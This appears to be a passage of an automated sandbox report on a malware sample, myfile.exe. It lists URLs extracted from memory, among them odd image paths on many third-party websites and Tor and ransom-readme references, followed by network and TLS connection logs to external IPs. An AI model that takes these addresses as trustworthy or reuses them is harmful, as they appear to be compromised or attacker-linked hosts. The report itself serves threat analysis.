Source: myfile.exe, 00000000.00000003.2365282654.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rsidesigns.com/wp-content/assets/iybw.jpg&
Source: myfile.exe, 00000000.00000003.2365373242.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rsidesigns.com/wp-content/assets/iybw.jpgl
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rsidesigns.com:443/wp-content/assets/iybw.jpg.pngResource0
Source: myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/a.storyblok.com/f/20
Source: myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/a.storyblok.com/f/201186/x/9041c53c26/masifardcn-med
Source: myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s3.amazonaws.com/a.storyblok.com/f/201186/x/9041c53c26/masifardcn-medium.otf)
Source: myfile.exe, 00000000.00000003.2365373242.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://satoblog.org/uploads/image/fixizcyhfz.jpg
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://satoblog.org:443/uploads/image/fixizcyhfz.jpgrces
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://schema.org
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skoczynski.eu:443/wp-content/image/wn.jpgjpgrces
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stanleyqualitysystems.com/content/images/gv.png
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stanleyqualitysystems.com:443/content/images/gv.pngesource0
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895325965.0000000004360000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa3
Source: myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/versioned-assets/1712250249111-G
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tailwindcss.com
Source: myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://testitjavertailut.net/
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://testitjavertailut.net:443/include/tmp/vzac.jpgpngResource0
Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr	String found in binary or memory: https://torproject.org/
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://use.typekit.net/cpt0jyz.css);
Source: myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vitoriaecoturismo.com.br/
Source: myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600404554.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vitoriaecoturismo.com.br/admin/graphic/tajahxayexuseayc.jpg
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vitoriaecoturismo.com.br:443/admin/graphic/tajahxayexuseayc.jpgbudsrejserallinclusive.dk/upl
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wribrazil.com:443/data/temp/twcwcymtpqdcchulbw.jpgfault
Source: myfile.exe, 00000000.00000002.2894114349.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com/
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.png
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.pngI
Source: myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.pngLocationETagAuthe-RangeContent-Monteion
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com/content/assets/jlbaveucagau.pngX
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com/~
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.almamidwifery.com:443/content/assets/jlbaveucagau.pngabulanov.comabulanov.com
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.altitudetrampolinepark.com/
Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bundan.com/
Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bundan.com/#website
Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bundan.com/?s=
Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bundan.com/feed/
Source: myfile.exe, 00000000.00000003.2839682725.000000000103D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bundan.com/wp-json/
Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bundan.com/xmlrpc.php
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/css/screen.css
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/favicon.ico
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/og-image.jpg
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/js/libs/modernizr.min.js
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.chainofhopeeurope.eu/wp-json/
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg
Source: myfile.exe, 00000000.00000002.2894114349.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpgLocationETagAuthentication-InfoAgeAccep
Source: myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9
Source: myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hostaletdelsindians.es/wp-includes/css/dist/block-library/style.min.css?ver=6.0.9
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpge0
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/#/schema/logo/image/
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/#organization
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/#website
Source: myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/0E
Source: myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/9E
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/?s=
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/comments/feed/
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/feed/
Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/static/tmp/vd.gif
Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/static/tmp/vd.gifH
Source: myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/static/tmp/vd.gifJd
Source: myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/static/tmp/vd.gifLMEMH
Source: myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/static/tmp/vd.gifLocationETagAuthentication-InfoAgeAccept-RangesLast-Modified
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/wp-content/uploads/2018/08/lexced-banca-dati-giuridica.jpg
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.lexced.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it/
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif-content/game/doiathwnvkwf.gif
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gifLocationETagAuthentication-InfoAgeAccep
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it/wp-json/
Source: myfile.exe, 00000000.00000003.2839610274.0000000005B25000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mieleshopping.it/xmlrpc.php
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yoast.com/wordpress/pluE
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yoast.com/wordpress/plugins/seo/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 35.215.83.253:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 160.153.0.131:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.58.213.84:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.108.65.79:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.160.0.18:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.40.30.106:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.61.68:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.116.147.189:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.71.217:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.120:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.15.159.75:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 160.153.0.174:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.130.22.108:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.158.62:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 134.209.129.254:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.92.72.56:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.4:49762 version: TLS 1.2
